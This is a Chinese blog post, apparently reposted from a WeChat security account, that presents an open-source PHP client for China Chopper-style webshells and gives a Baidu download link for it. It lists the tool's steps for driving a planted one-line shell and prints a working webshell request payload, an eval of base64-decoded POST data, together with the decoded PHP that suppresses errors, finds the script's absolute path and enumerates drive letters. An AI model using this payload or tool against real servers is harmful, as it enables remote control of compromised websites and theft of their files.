php版web菜刀(开源)

  • A+
所属分类:安全工具

php版菜刀思路

1.判断一句话地址返回的http特征码是否是200/500

2.通过post传值执行函数

3.获取一句话文件的当前绝对路劲

4.获取当前服务器的盘符

5.遍历当前一句话文件目录下的目录与文件

6.获取当前一句话文件目录下的目录与文件的权限,创建时间,文件大小

***************************************************************

代码思路

=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

 

@ini_set("display_errors","0");

 

@set_time_limit(0);

 

@set_magic_quotes_runtime(0);

 

echo("-+|");;

 

$D=dirname($_SERVER["SCRIPT_FILENAME"]);

 

echo $D."t";

 

if(substr($D,0,1)!="/"){

 

foreach(range("A","Z") as $L)

 

if(is_dir($L.":"))

 

echo($L.":");

 

};

 

echo("|<-");

 

die();

 

echo $D=dirname($_SERVER["SCRIPT_FILENAME"]);  //获取绝对路劲

 

foreach(range("A","Z") as $L) if(is_dir($L.":")) echo($L.":");//获取盘符

下载链接:<a href="http://pan.baidu.com/s/1pL6bfJX" target="_blank">http://pan.baidu.com/s/1pL6bfJX</a>   密码: bfx3

 

功能可能不是很全面。代码提供给大家作为参考谢谢。


本文始发于微信公众号(飓风网络安全):php版web菜刀(开源)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: